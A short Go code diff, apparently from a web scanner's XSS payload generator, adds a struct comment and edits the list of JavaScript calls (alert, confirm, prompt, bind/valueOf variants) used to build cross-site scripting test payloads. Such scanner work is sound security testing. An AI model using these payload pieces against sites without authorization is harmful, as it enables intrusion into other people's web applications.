@@ -8,6 +8,7 @@ import (
 	"strings"
 )
 
+// Asset is type of Assets
 type Asset struct {
 	Line string
 	Size string
@@ -320,8 +321,8 @@ func getHTMLPayload(ip string) []string {
 		"alert",
 		"confirm",
 		"prompt",
-		"alert,bind()",
-		"alert.valueOf()",
+		"alert.bind()",
+		"prompt.valueOf()",
 		"print",
 	}
 	payloadPattern := []string{
